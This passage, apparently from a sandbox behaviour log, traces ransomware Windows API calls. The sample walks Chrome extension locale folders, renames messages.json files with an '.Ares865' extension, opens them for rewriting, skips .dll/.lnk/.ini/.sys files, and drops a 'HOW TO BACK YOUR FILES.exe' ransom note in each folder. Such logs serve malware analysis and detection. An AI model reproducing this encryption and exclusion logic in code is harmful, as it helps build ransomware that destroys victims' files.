ftLastWriteTime.dwLowDateTime=0x4e312520, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0100.877] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0100.877] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0100.877] lstrcpyW (in: lpString1=0x2cce516, lpString2="messages.json" | out: lpString1="messages.json") returned="messages.json" [0100.877] lstrlenW (lpString="messages.json") returned 13 [0100.877] lstrlenW (lpString="Ares865") returned 7 [0100.877] lstrcmpiW (lpString1="es.json", lpString2="Ares865") returned 1 [0100.877] lstrlenW (lpString=".dll") returned 4 [0100.877] lstrcmpiW (lpString1="messages.json", lpString2=".dll") returned 1 [0100.877] lstrlenW (lpString=".lnk") returned 4 [0100.877] lstrcmpiW (lpString1="messages.json", lpString2=".lnk") returned 1 [0100.877] lstrlenW (lpString=".ini") returned 4 [0100.877] lstrcmpiW (lpString1="messages.json", lpString2=".ini") returned 1 [0100.877] lstrlenW (lpString=".sys") returned 4 [0100.877] lstrcmpiW (lpString1="messages.json", lpString2=".sys") returned 1 [0100.877] lstrlenW (lpString="messages.json") returned 13 [0100.877] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\ru\\messages.json.Ares865") returned 160 [0100.878] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\ru\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\ru\\messages.json"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\ru\\messages.json.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\ru\\messages.json.ares865"), dwFlags=0x1) returned 1 [0100.879] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\ru\\messages.json.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\ru\\messages.json.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0100.879] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=286) returned 1 [0100.883] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\ro", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\ro") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\ro" [0100.883] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\ro" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\ro") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\ro" [0100.883] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0100.883] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\ro\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\ro\\how to back your files.exe"), bFailIfExists=1) returned 0 [0100.883] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0100.884] GetLastError () returned 0x0 [0100.884] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0100.884] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\ro\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x869d6170, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x4e312520, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4e312520, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0100.884] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0100.884] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0100.884] lstrcpyW (in: lpString1=0x2cce516, lpString2="messages.json" | out: lpString1="messages.json") returned="messages.json" [0100.884] lstrlenW (lpString="messages.json") returned 13 [0100.884] lstrlenW (lpString="Ares865") returned 7 [0100.884] lstrcmpiW (lpString1="es.json", lpString2="Ares865") returned 1 [0100.884] lstrlenW (lpString=".dll") returned 4 [0100.884] lstrcmpiW (lpString1="messages.json", lpString2=".dll") returned 1 [0100.884] lstrlenW (lpString=".lnk") returned 4 [0100.884] lstrcmpiW (lpString1="messages.json", lpString2=".lnk") returned 1 [0100.885] lstrlenW (lpString=".ini") returned 4 [0100.885] lstrcmpiW (lpString1="messages.json", lpString2=".ini") returned 1 [0100.885] lstrlenW (lpString=".sys") returned 4 [0100.885] lstrcmpiW (lpString1="messages.json", lpString2=".sys") returned 1 [0100.885] lstrlenW (lpString="messages.json") returned 13 [0100.885] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\ro\\messages.json.Ares865") returned 160 [0100.885] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\ro\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\ro\\messages.json"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\ro\\messages.json.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\ro\\messages.json.ares865"), dwFlags=0x1) returned 1 [0100.886] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\ro\\messages.json.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\ro\\messages.json.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0100.887] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=265) returned 1 [0100.890] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\pt_PT", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\pt_PT") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\pt_PT" [0100.890] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\pt_PT" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\pt_PT") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\pt_PT" [0100.890] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0100.890] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\pt_PT\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\pt_pt\\how to back your files.exe"), bFailIfExists=1) returned 0 [0100.891] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0100.891] GetLastError () returned 0x0 [0100.891] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0100.891] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\pt_PT\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x869d6170, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x4e312520, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4e312520, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0100.891] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0100.891] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0100.892] lstrcpyW (in: lpString1=0x2cce51c, lpString2="messages.json" | out: lpString1="messages.json") returned="messages.json" [0100.892] lstrlenW (lpString="messages.json") returned 13 [0100.892] lstrlenW (lpString="Ares865") returned 7 [0100.892] lstrcmpiW (lpString1="es.json", lpString2="Ares865") returned 1 [0100.892] lstrlenW (lpString=".dll") returned 4 [0100.892] lstrcmpiW (lpString1="messages.json", lpString2=".dll") returned 1 [0100.892] lstrlenW (lpString=".lnk") returned 4 [0100.892] lstrcmpiW (lpString1="messages.json", lpString2=".lnk") returned 1 [0100.892] lstrlenW (lpString=".ini") returned 4 [0100.892] lstrcmpiW (lpString1="messages.json", lpString2=".ini") returned 1 [0100.892] lstrlenW (lpString=".sys") returned 4 [0100.892] lstrcmpiW (lpString1="messages.json", lpString2=".sys") returned 1 [0100.892] lstrlenW (lpString="messages.json") returned 13 [0100.892] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\pt_PT\\messages.json.Ares865") returned 163 [0100.892] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\pt_PT\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\pt_pt\\messages.json"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\pt_PT\\messages.json.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\pt_pt\\messages.json.ares865"), dwFlags=0x1) returned 1 [0100.893] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\pt_PT\\messages.json.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\pt_pt\\messages.json.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0100.894] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=223) returned 1 [0100.898] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\pt_BR", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\pt_BR") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\pt_BR" [0100.898] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\pt_BR" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\pt_BR") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\pt_BR" [0100.898] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0100.898] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\pt_BR\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\pt_br\\how to back your files.exe"), bFailIfExists=1) returned 0 [0100.899] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0100.899] GetLastError () returned 0x0 [0100.900] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0100.900] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\pt_BR\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x86a22430, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x4e338680, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4e338680, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0100.900] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0100.900] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0100.900] lstrcpyW (in: lpString1=0x2cce51c, lpString2="messages.json" | out: lpString1="messages.json") returned="messages.json" [0100.900] lstrlenW (lpString="messages.json") returned 13 [0100.900] lstrlenW (lpString="Ares865") returned 7 [0100.900] lstrcmpiW (lpString1="es.json", lpString2="Ares865") returned 1 [0100.900] lstrlenW (lpString=".dll") returned 4 [0100.900] lstrcmpiW (lpString1="messages.json", lpString2=".dll") returned 1 [0100.900] lstrlenW (lpString=".lnk") returned 4 [0100.900] lstrcmpiW (lpString1="messages.json", lpString2=".lnk") returned 1 [0100.900] lstrlenW (lpString=".ini") returned 4 [0100.900] lstrcmpiW (lpString1="messages.json", lpString2=".ini") returned 1 [0100.900] lstrlenW (lpString=".sys") returned 4 [0100.900] lstrcmpiW (lpString1="messages.json", lpString2=".sys") returned 1 [0100.900] lstrlenW (lpString="messages.json") returned 13 [0100.900] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\pt_BR\\messages.json.Ares865") returned 163 [0100.900] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\pt_BR\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\pt_br\\messages.json"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\pt_BR\\messages.json.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\pt_br\\messages.json.ares865"), dwFlags=0x1) returned 1 [0100.902] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\pt_BR\\messages.json.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\pt_br\\messages.json.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0100.902] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=222) returned 1 [0100.905] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\pl", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\pl") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\pl" [0100.905] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\pl" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\pl") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\pl" [0100.905] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0100.905] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\pl\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\pl\\how to back your files.exe"), bFailIfExists=1) returned 0 [0100.906] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0100.906] GetLastError () returned 0x0 [0100.906] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0100.906] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\pl\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x869fc2d0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x4e338680, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4e338680, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0100.906] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0100.906] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0100.907] lstrcpyW (in: lpString1=0x2cce516, lpString2="messages.json" | out: lpString1="messages.json") returned="messages.json" [0100.907] lstrlenW (lpString="messages.json") returned 13 [0100.907] lstrlenW (lpString="Ares865") returned 7 [0100.907] lstrcmpiW (lpString1="es.json", lpString2="Ares865") returned 1 [0100.907] lstrlenW (lpString=".dll") returned 4 [0100.907] lstrcmpiW (lpString1="messages.json", lpString2=".dll") returned 1 [0100.907] lstrlenW (lpString=".lnk") returned 4 [0100.907] lstrcmpiW (lpString1="messages.json", lpString2=".lnk") returned 1 [0100.907] lstrlenW (lpString=".ini") returned 4 [0100.907] lstrcmpiW (lpString1="messages.json", lpString2=".ini") returned 1 [0100.907] lstrlenW (lpString=".sys") returned 4 [0100.907] lstrcmpiW (lpString1="messages.json", lpString2=".sys") returned 1 [0100.907] lstrlenW (lpString="messages.json") returned 13 [0100.907] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\pl\\messages.json.Ares865") returned 160 [0100.907] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\pl\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\pl\\messages.json"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\pl\\messages.json.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\pl\\messages.json.ares865"), dwFlags=0x1) returned 1 [0100.909] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\pl\\messages.json.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\pl\\messages.json.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, 